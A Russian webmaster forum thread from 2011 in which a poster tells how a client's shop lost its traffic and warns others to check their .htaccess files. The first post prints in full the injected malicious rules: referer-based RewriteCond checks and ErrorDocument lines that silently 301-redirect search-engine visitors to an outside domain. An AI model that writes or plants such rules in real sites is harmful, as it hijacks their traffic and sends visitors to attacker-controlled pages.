А вы давно проверяли свой htaccess ;) ?

А вы давно проверяли свой htaccess ;) ?, Взламывают ... но красиво!

Опции

LihKo

Topic Starter

17.6.2011, 1:27; Ответить: LihKo

Сообщение #1

Завсегдатай

Группа: Active User
Сообщений: 594
Регистрация: 12.5.2009
Из: NN
Поблагодарили: 163 раза
Репутация:

36

Приветствую всех.
Вчера, звонит мне один из моих бывших клиентов. Говорит, что мол резко траф упал и все такое, народу нет, беда, горит и тд...
Ну в общем сопли, слюни и все такое. Признаться, я даже "про себя" начал злорадствовать.
На днях предлагал ему по договору полное обслуживание под ключ, а он типа, "сами с усами", не буду мол тратить деньги за воздух.
А предлагал то всего-навсего перенести его магазин+форум ко мне на сервак, ну и стандартное админинистрирование, все по божески, тем более знакомы давно.
Но нет, пошел человек своей дорогой - шаред хост за 10$/мес и типа счастлив ....
Ну да ладно, сейчас не об этом. Так вот, пуская сопли пузырем, кричит, что не может понять в чем дело, народу и заказов нет, на форуме странная тишина.
Помоги!
Взял у него доступ, полез смотреть, что и как ...
Даже первые минут десять был озадачен. Позиции на месте, индексация как и была. Навигация и функционал - как и было ... даже странно... народу действительно нет.
Начал смотреть логи и чуть со стула не упал!!!

)))
Ни одного "нормального" 200 ответа, кроме прямых заходов.
И вот она "ласточка":

ErrorDocument 400 http://switch-window.ru/insertindex.php
ErrorDocument 401 http://switch-window.ru/insert/index.php
ErrorDocument 403 http://switch-window.ru/insert/index.php
ErrorDocument 404 http://switch-window.ru/insert/index.php
ErrorDocument 500 http://switch-window.ru/insert/index.php
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*baidu.* [OR]
RewriteCond %{HTTP_REFERER} .*youtube.* [OR]
RewriteCond %{HTTP_REFERER} .*wikipedia.* [OR]
RewriteCond %{HTTP_REFERER} .*qq.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.* [OR]
RewriteCond %{HTTP_REFERER} .*facebook.* [OR]
RewriteCond %{HTTP_REFERER} .*twitter.* [OR]
RewriteCond %{HTTP_REFERER} .*blog.* [OR]
RewriteCond %{HTTP_REFERER} .*live.* [OR]
RewriteCond %{HTTP_REFERER} .*myspace.* [OR]
RewriteCond %{HTTP_REFERER} .*mail.* [OR]
RewriteCond %{HTTP_REFERER} .*yandex.* [OR]
RewriteCond %{HTTP_REFERER} .*rambler.* [OR]
RewriteCond %{HTTP_REFERER} .*ya.* [OR]
RewriteCond %{HTTP_REFERER} .*aport.* [OR]
RewriteCond %{HTTP_REFERER} .*linkedin.* [OR]
RewriteCond %{HTTP_REFERER} .*flickr.*
RewriteRule ^(.*)$ http://switch-window.ru/insert/index.php [R=301,L]

Это было дописано в конец htaccess лежащего в корне.
Вы спросите, а причем тут посещалка? Да все гениально!
Я бы парням(тем кто это сделал) сначала даже может быть руку пожал за такую идею, ну а потом бы голову отвернул

))))
Для тех, кто "в танке" - правило работает на тех, кто идут с рефом(прописаным). Так например если пользователь приходит из поиска Яндекса, Гугла и тд, то он будет тут-же "телепортирован". При прямом заходе(например набор адреса в браузере ручками) - нет.
Куда? А вот сюда:

http://shara.lots-moment-archiv.ru/results.php?notds=1&query=host:vash-site.ru%20|%20host:www.vash-site.ru

(даю одну из возможных комбинаций, но акцептор редиректа, всегда один и тот-же. По крайней мере мне другой не попался.)

Кстати, проверил еще пару сайтов, что были на одном ip с магазином моего клинта - перебрал только 5 и все "болные", дальше не стал ...

Так что господа вебмастера - НЕ расслабляйтесь!

Вот собственно и вся история - 45 минут работы и боооооооооооооольшой провал в посещалке магазина(выручке разумеется тоже). Скупой - как всегда - заплатил х2.

ЗЫ. Консультаций по аудиту безопасности сайтов не оказываю, ибо сам считаю себя слабо подготовленным в этой области. Для этого есть специально обученные люди, всегда работаю с такими, если что сам не могу решить. На форуме есть такие ...ищите ...

--------------------

В реальности, не все так, как кажется очевидным ...
@ Shell-init: permission denied

Поблагодарили: (1)

lexx-t

2

Ответить с цитированием данного сообщения

south_park south_park 17.6.2011, 1:33; Сообщений: 909 Поблагодарили: 240 раз Репутация: 72 Просмотр профиля	17.6.2011, 1:33; Ответить: south_park Сообщение #2
Лентяй и балбес хD Группа: Active User Сообщений: 909 Регистрация: 25.2.2009 Из: Череповец Поблагодарили: 240 раз Репутация: 72	Довольный клиент теперь торчит ящик пенящегося напитка? -------------------- Дешевые VPS,VDS,немецкое качество, много оперативки.

LihKo Topic Starter LihKoTopic Starter 17.6.2011, 1:59; Сообщений: 594 Поблагодарили: 163 раза Репутация: 36 Просмотр профиля	Topic Starter 17.6.2011, 1:59; Ответить: LihKo Сообщение #3
Завсегдатай Группа: Active User Сообщений: 594 Регистрация: 12.5.2009 Из: NN Поблагодарили: 163 раза Репутация: 36	(south_park @ 17.6.2011, 1:33) Довольный клиент теперь торчит ящик пенящегося напитка? Что-то типа такого. -------------------- В реальности, не все так, как кажется очевидным ... @ Shell-init: permission denied

prometeika prometeika 10.7.2011, 23:46; Сообщений: 101 Поблагодарили: 13 раз Репутация: 1 Просмотр профиля	10.7.2011, 23:46; Ответить: prometeika Сообщение #4
Участник Группа: User Сообщений: 101 Регистрация: 5.7.2011 Поблагодарили: 13 раз Репутация: 1	У меня этот файл вообще пустой. Это нормально?

super_repus super_repus 11.7.2011, 0:05; Сообщений: 89 Поблагодарили: 10 раз Репутация: 0 Просмотр профиля	11.7.2011, 0:05; Ответить: super_repus Сообщение #5
Частый гость Группа: User Сообщений: 89 Регистрация: 17.11.2010 Поблагодарили: 10 раз Репутация: 0	Не совсем понятно - это типа хостер чудеса такие вытворяет? Или клиент вируса подхватил на сайт? -------------------- World Dance News

Psyholord Psyholord 11.7.2011, 0:16; Сообщений: 978 Поблагодарили: 269 раз Репутация: 31 Просмотр профиля	11.7.2011, 0:16; Ответить: Psyholord Сообщение #6
Яндексу не устоять Группа: Active User Сообщений: 978 Регистрация: 20.2.2009 Из: Москва Поблагодарили: 269 раз Репутация: 31	Вывод 1. Не юзайте гавно хостинг, свой сервак форевер. Насчет идеи прикольно замутили молодцы. -------------------- Слушать музыку бесплатно

tilla

11.7.2011, 0:29; Ответить: tilla

Сообщение #7

Участник

Группа: User
Сообщений: 185
Регистрация: 21.11.2010
Из: Тверь
Поблагодарили: 43 раза
Репутация:

9

давно не смотрел что у меня там

<3 nginx

Замечание модератора:
Эта тема была закрыта автоматически ввиду отсутствия активности в ней на протяжении 100+ дней.
Если Вы считаете ее актуальной и хотите оставить сообщение, то воспользуйтесь кнопкой

или обратитесь к любому из модераторов.

Сообщение отредактировал tilla - 11.7.2011, 0:29

--------------------

SEO блоги они такие уникальные.

« Предыдущая тема · Прочее · Следующая тема »

2 чел. читают эту тему (гостей: 2, скрытых пользователей: 0)

Пользователей: 0

Похожие темы

Тема	Ответов	Автор	Просмотров	Последний ответ
Раскройте свой потенциал заработка с помощью 2x2 Media Network — вашего пути к выгодным предложениям CPA! Присоединяйтесь к 2x2 Media Network, вашему надежному партнеру в мире	11	2x2MediaLimited	3276	18.4.2024, 4:22 автор: 2x2MediaLimited
1000 игровых автоматов (демо-версии) для встраивания на свой сайт Слоты для встраивания	3	VulcanBit	1130	6.12.2023, 19:12 автор: Boymaster
Royal Partners - монетизируй свой траф на самых выгодных условиях!	49	RoyalPartners	15597	20.10.2023, 9:48 автор: RoyalPartners
Свой cash-back сервис Партнерская программа	9	MirexPay	1841	7.8.2023, 20:39 автор: EvilGomel
Продам свой аккаунт FirstVDS c балансом 4500 и ежемесячным реф. доходом 140 RUR	7	SammoLove	2175	20.2.2023, 4:17 автор: SammoLove